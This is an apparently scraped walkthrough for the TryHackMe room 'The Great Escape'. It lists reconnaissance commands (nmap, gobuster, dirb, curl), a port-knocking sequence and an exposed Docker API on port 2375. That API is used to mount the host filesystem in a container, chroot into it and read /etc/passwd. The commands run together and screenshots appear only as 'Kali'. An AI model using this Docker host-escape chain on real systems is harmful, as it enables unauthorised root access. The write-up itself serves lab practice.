Room Link: https://tryhackme.com/r/room/thegreatescape
Kali
nmap -A $VICTIM
Kali
Its returning too much from 200 so we need to filter it out
Kali
Kali
Had to add .well-known to the wordlist, wasn't in any of Tryhackme's default wordlists
None of this was working, try later.
Kali
Kali
Kali
Kali
Kali
Kali
daemon.json
Kali
Wait 30 seconds
Kali
Kali
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster -e dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcardgobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirb/common.txt --wildcard -s"204,301,302,307,401,403"dirb http://$VICTIM/.well-known -X .txtcurl http://$VICTIM/.well-known/security.txtcurl http://$VICTIM/api/fl46curl http://$VICTIM/robots.txtgit clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
nmap $VICTIM -p 2375subl /etc/docker/daemon.json{
"insecure-registries" : ["10.10.90.88:2375"]
}sudo systemctl stop dockersudo systemctl start dockerdocker -H $VICTIM:2375 images
docker -H $VICTIM:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
cat /etc/passwd